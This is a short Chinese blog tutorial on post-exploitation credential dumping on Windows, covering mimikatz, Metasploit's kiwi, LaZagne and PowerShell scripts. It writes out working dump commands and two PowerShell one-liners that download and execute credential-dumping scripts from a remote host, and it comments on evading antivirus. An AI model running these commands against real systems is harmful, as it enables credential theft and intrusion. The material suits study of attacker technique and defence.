本文为大家介绍在渗透测试后期,抓取Windows系统密码常用的几款工具。喜欢就收藏本文吧!
当我们利用msf
或者其他漏洞成功获得系统会话后,接下来我们可以各种密码抓取工具来获取系统的管理员密码。从而进一步提升自身权限。
关于Windows认证
Windows的认证包括三个部分:
-
本地认证
:用户直接操作计算机登录账户。(如:大表哥输入密码登录了自己的电脑。) -
网络认证
:远程连接到工作组中的某个设备(如:远程登录某台服务器) -
域认证
:登陆到域环境中的某个设备
也就是说,当用户输入密码,系统收到密码后将用户输入的密码计算成NTLM Hash
与sam
数据(%SystemRoot%system32configsam
)中该用户的哈希比对 匹配则登录成功,不匹配则登录失败。
密码恢复神器 mimikatz
mimikatz
是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe
进程里获取windows
处于active
状态账号的明文密码。(即直接从系统进程中获取密码,无需破解。高版本系统目前可能不成功。)
项目地址:https://github.com/gentilkiwi/mimikatz/releases/latest
用管理员权限运行mimikatz.exe
,然后输入下面命令
privilege::debug
sekurlsa::logonpasswords
当然我们可以利用msf建立连接后也可以使用mimikatz
输入load mimikatz
然后输入wdigest
就可以获取明文密码
kiwi
为了解决mimikatz
高版本不成功的问题,在msf
框架中引入了kiwi
这款神器。相比之下kiwi的功能更加全面。不仅能加载系统的密码,还可以抓取WiFi的密码。如获取系统密码
creds_all
wifi密码
Powershell配合脚本
上述两款工具,虽说很强大。但是当系统中有杀毒软件时,就显得心有余而力不足。我们可以通过Powershell
命令只需脚本的方式来实现。
🎃Powershell远程加载mimikatz脚本
powershell IEX (New-Object Net.WebClient).DownloadString('http://ip:prot/Invoke-Mimikatz.ps1');Invoke-Mimikatz –DumpCreds
🍭Powershell加载Get-PassHashes脚本
powershell IEX(new-object net.webclient).downloadstring('http://47.x.x.85/Get-PassHashes.ps1');Get-PassHashes
LaZagne
LaZagne
是基于python环境的windows密码恢复工具。同时支持获取浏览器中保存的密码、maven
svn
wifi
等密码信息。
项目地址:https://github.com/AlessandroZ/LaZagne
🎉安装
pipinstall -r requirements.txt
或者,我们可以直接下载编译好的exe文件。
获取系统所有密码
laZagne.exe all
在实际测试中发现,laZagne
的免杀效果要比前者略好。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):浅谈Windows下哪些密码恢复工具
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论